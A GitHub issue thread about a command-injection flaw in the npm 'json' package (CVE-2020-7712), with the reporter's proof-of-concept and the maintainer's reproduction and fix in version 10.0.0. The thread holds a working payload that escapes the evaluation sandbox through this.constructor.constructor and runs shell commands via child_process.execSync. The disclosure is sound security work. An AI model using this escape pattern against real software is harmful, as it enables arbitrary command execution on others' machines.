Command Injection #144

po6ix · 2020-08-06T07:10:51Z

POC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}');
console.log(res);

trentm · 2020-08-23T20:45:18Z

I concur, this is a vulnerability. Repro on the CLI:

[13:40:35 trentm@purple:~/tm/json (git:master)]
% ls hi.txt
ls: hi.txt: No such file or directory

[13:40:39 trentm@purple:~/tm/json (git:master rv:1)]
% echo '{"foo": "bar"}' | json '{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch hi.txt").toString()]:1}'

[13:40:51 trentm@purple:~/tm/json (git:master)]
% ls hi.txt
hi.txt

Internally parseLookup is using vm.runInNewContext to eval the lookup string between the brackets.

I propose a breaking change to json (to be released as version 10.0.0) that would limit the supported syntax for bracketed lookup strings such that eval'ing is not necessary.

Here is the attempted repro result after my current draft of changes:

[13:44:25 trentm@purple:~/tm/json (git:master)]
% ls hi.txt
ls: hi.txt: No such file or directory
[13:44:27 trentm@purple:~/tm/json (git:master rv:1)]
% echo '{"foo": "bar"}' | ./lib/json.js '{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch hi.txt").toString()]:1}'
/Users/trentm/tm/json/lib/json.js:892
                        throw new Error(format('invalid bracketed lookup ' +
                        ^

Error: invalid bracketed lookup string: "[this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"touch hi.txt\").toString()]" (must be of the form ['...'], ["..."], or [`...`])
    at parseLookup (/Users/trentm/tm/json/lib/json.js:892:31)
    at /Users/trentm/tm/json/lib/json.js:1367:16
    at Array.map (<anonymous>)
    at main (/Users/trentm/tm/json/lib/json.js:1366:30)
    at Object.<anonymous> (/Users/trentm/tm/json/lib/json.js:1749:5)
    at Module._compile (internal/modules/cjs/loader.js:778:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:789:10)
    at Module.load (internal/modules/cjs/loader.js:653:32)
    at tryModuleLoad (internal/modules/cjs/loader.js:593:12)
    at Function.Module._load (internal/modules/cjs/loader.js:585:3)
[13:44:38 trentm@purple:~/tm/json (git:master rv:1)]
% ls hi.txt
ls: hi.txt: No such file or directory

This restricts the supported syntax for *bracketed* parts of lookup strings to avoid the need to *eval* that string. The eval is a security vulnerability that allows command injection. Fixes #144

#145) This restricts the supported syntax for *bracketed* parts of lookup strings to avoid the need to *eval* that string. The eval is a security vulnerability that allows command injection. CVE-2020-7712 Fixes #144

trentm · 2020-08-28T22:52:35Z

[email protected] is published to npm, and a "10.0.0" git tag added.

Thanks for the report!

trentm mentioned this issue Aug 23, 2020

BREAKING CHANGE: limit syntax for bracketed lookup strings to fix vuln #145

Merged

trentm self-assigned this Aug 23, 2020

trentm closed this as completed in #145 Aug 28, 2020

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Command Injection #144

Command Injection #144

po6ix commented Aug 6, 2020

trentm commented Aug 23, 2020

trentm commented Aug 28, 2020

Command Injection #144

Command Injection #144

Comments

po6ix commented Aug 6, 2020

POC

trentm commented Aug 23, 2020

trentm commented Aug 28, 2020